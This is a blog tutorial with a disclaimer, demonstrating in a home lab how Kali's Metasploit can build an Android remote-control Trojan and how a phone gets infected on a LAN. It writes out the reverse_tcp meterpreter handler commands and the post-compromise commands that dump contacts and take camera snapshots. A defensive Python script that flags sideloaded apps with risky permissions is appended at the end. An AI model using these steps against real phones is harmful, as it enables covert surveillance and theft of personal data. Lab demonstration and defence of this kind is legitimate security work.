Penetration Testing: Compromising a LAN Phone with Kali

Foreword

Solemn statement: This article is limited to technical discussion and sharing; using it for illegal purposes is strictly prohibited.

Purpose of this article: to demonstrate how to use the Metasploit penetration testing framework on Kali Linux to generate a remote-control Trojan and then infect an Android phone on the local area network, enabling operations on the victim's phone such as reading data, audio eavesdropping, obtaining its location, and installing or uninstalling software.

Environment Description

Machine                  IP address
Win10 physical host      192.168.0.105
Kali virtual machine     192.168.0.199
Honor 8 test phone       192.168.0.107

The Win10 host and the phone must be connected to the same WIFI. The Kali virtual machine is installed in VMware and configured in bridged mode so that its IP address is in the same network segment as the physical host and the phone, forming a small local area network.

For how to configure the virtual machine's IP and network, see another blog post: Penetration Testing - Kali virtual machine.

Preparing the attack

Generating the Trojan

1. First, to state the obvious, confirm the IP address configured on the Kali virtual machine.
2. In a Kali terminal, run the command that generates the Trojan file 520.apk under the /root path of the Kali virtual machine.

Transferring the Trojan

The remote-control Trojan file has been generated, but how is it transferred from the Kali virtual machine to the Win10 physical host and then on to the victim's phone?

1. Using the remote connection tool Xshell, create a new file transfer session over the SFTP protocol.
2. Also configure the local folder paired with the remote Kali host, that is, the default path on the Win10 host where transferred files are stored.
3. Enter the Kali host's account and password to log in. After connecting successfully, use the command get 520.apk to download the Trojan file from the Kali host to the local folder D:\Code.
4. On the Win10 host, check the local folder to confirm that the file was downloaded successfully.

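Installing the Trojan

1. Again at the risk of stating the obvious, check and confirm that the Huawei test phone's IP address is in the same network segment as the Kali virtual machine and the Win10 host.
2. From the Kali virtual machine, check whether the phone is reachable (this is the basis for the later attack to succeed).
3. On the Win10 host, open QQ, send the Trojan file to the Huawei phone and install it (surely no need to demonstrate this...).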

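Starting the attack

MSF listener

Run the following commands in order in a Kali terminal:

msfconsole                // start msfconsole
use exploit/multi/handler // load the module
set payload android/meterpreter/reverse_tcp // select the payload
set lhost 192.168.0.199  // set this to the IP address used when generating the Trojan just now
set lport 9999           // set this to the port the Trojan generated just now listens on
exploit                  // start the exploit, begin listening and wait for the phone to come online

1. In the Kali terminal, enter the msfconsole command to start the Metasploit framework.
2. Run the commands in order to load the attack module, select the payload, and set the IP and port of the local listening host.
3. Run the exploit command to start the attack program and enter the listening state, waiting for the target phone to come online (the user taps the Trojan app).
4. Now manually tap the icon of the MainActivity app just installed on the phone (it has no interface), and the attack session is established.
5. Entering the help command at this point lists the specific attack commands and their descriptions; a few are demonstrated below.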

Command-line execution

Once the attack session is established, commands can be executed on the victim's phone just as in a shell on a Linux host.

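Downloading contacts

1. In the attack session, run the dump_contacts command to export the contacts on the victim's phone to the /root path on the Kali virtual machine.
2. View the exported contacts file in the virtual machine.
3. The SMS records and call logs on the victim's phone can be exported in the same way... but this phone has no SIM card inserted (broke...), so that is not demonstrated here.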

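Camera capture

In the attack session, running the webcam_snap command turns on the victim's camera, automatically takes a photo and saves it to the Kali virtual machine.
In the same way, the audio recording and screenshot functions of the victim's phone can also be invoked illicitly...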

This concludes the demonstration of using Kali to generate a remote-control Trojan and attack an Android phone on the LAN. Readers interested in other attack operations can try them out using the command descriptions given by the help command.

Reminder: the Trojan in this demonstration has no graphical interface and is not disguised. In a real-world environment an attacker would disguise it as normal software, which reminds us not to install software from unknown sources, and not to connect casually to public WIFI, which exposes our devices to a local area network set up by an attacker...
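
As an added example that is not part of the original post: a small Python audit of an installed-app inventory that flags apps from untrusted sources combining network access with the permissions behind the capabilities demonstrated above (contacts, SMS and call logs, camera, microphone, location). The inventory format, package names, source labels and threshold are assumptions constructed for illustration; the permission names are standard Android permissions.

```python
from dataclasses import dataclass

INTERNET = "android.permission.INTERNET"
TRUSTED_SOURCES = {"store", "system"}  # assumed labels used in the constructed inventory
# Capability groups for the kinds of data the article's session reaches.
CAPABILITIES = {
    "contacts": {"android.permission.READ_CONTACTS"},
    "sms/call log": {"android.permission.READ_SMS", "android.permission.READ_CALL_LOG"},
    "camera": {"android.permission.CAMERA"},
    "microphone": {"android.permission.RECORD_AUDIO"},
    "location": {"android.permission.ACCESS_FINE_LOCATION",
                 "android.permission.ACCESS_COARSE_LOCATION"},
}
# Constructed sample (assumed format): package|label|install source|requested permissions
INVENTORY = """\
com.example.notes|Notes|store|android.permission.INTERNET
com.example.camera|Camera|system|android.permission.CAMERA,android.permission.RECORD_AUDIO,android.permission.ACCESS_FINE_LOCATION
com.example.flashlight|Flashlight|sideloaded|android.permission.INTERNET,android.permission.CAMERA
com.example.unknown|MainActivity|sideloaded|android.permission.INTERNET,android.permission.READ_CONTACTS,android.permission.READ_SMS,android.permission.CAMERA,android.permission.RECORD_AUDIO,android.permission.ACCESS_FINE_LOCATION
"""

@dataclass(frozen=True)
class App:
    package: str
    label: str
    source: str
    permissions: frozenset

def parse_inventory(text):
    """Parse the pipe-separated inventory; blank lines are skipped."""
    apps = []
    for line in filter(None, (l.strip() for l in text.splitlines())):
        package, label, source, perms = line.split("|")
        apps.append(App(package, label, source, frozenset(filter(None, perms.split(",")))))
    return apps

def sensitive_capabilities(app):
    """Names of the capability groups touched by the app's permissions."""
    return sorted(name for name, perms in CAPABILITIES.items() if perms & app.permissions)

def audit(apps, threshold=3):
    """Flag untrusted-source apps with network access and >= threshold groups."""
    return [(a.package, sensitive_capabilities(a)) for a in apps
            if a.source not in TRUSTED_SOURCES and INTERNET in a.permissions
            and len(sensitive_capabilities(a)) >= threshold]

if __name__ == "__main__":
    for package, caps in audit(parse_inventory(INVENTORY)):
        print(f"REVIEW {package}: {', '.join(caps)}")
```

A flagged app is a candidate for manual review, not a verdict; the threshold trades missed detections against noise from legitimate apps that need several of these permissions.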

Origin blog.csdn.net/weixin_39190897/article/details/104463705